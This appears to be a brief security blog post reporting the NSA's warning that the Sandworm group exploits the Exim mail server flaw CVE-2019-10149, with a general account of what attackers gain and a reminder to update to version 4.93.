You can practically hear the Russian hacking group, Sandworm, aka BlackEnergy, yelling “No mercy!” at their computers as they successfully exploit the vulnerability that exists within the Exim mail servers.
According to the NSA, there is a bug (CVE-2019-10149) in the open-source Exim Mail Transfer Agent (MTA) software that allows hackers to not only receive emails from local and remote users, but also allows them to re-route and deliver them. It provides the unauthorized hijackers root privileges, so the bad actors can also install programs and create new accounts while also changing any data they’d like to change. And to make matters even worse? It’s also wormable!
And while this was patched almost a year ago, the NSA just last week announced Sandworm/BlackEnergy has been exploiting unpatched users with emails using a modified “Main From” field. Once exploited, the group is then able to wreak havoc by downloading then executing malicious script that allows them to not only have access to emails, but also provides them with the ability to:
- Install more malware
- Add privileged users
- Disable network security settings
- Update SSH configurations to enable additional remote access
In order to protect yourself, it’s imperative that you use at least version 4.93.
You have heard us say it before and you will undoubtedly hear it again from us… Make sure your software is up-to-date. Yes, it can be a pain sometimes, but not as big of a pain as giving Russian spies full access to your emails and your work devices.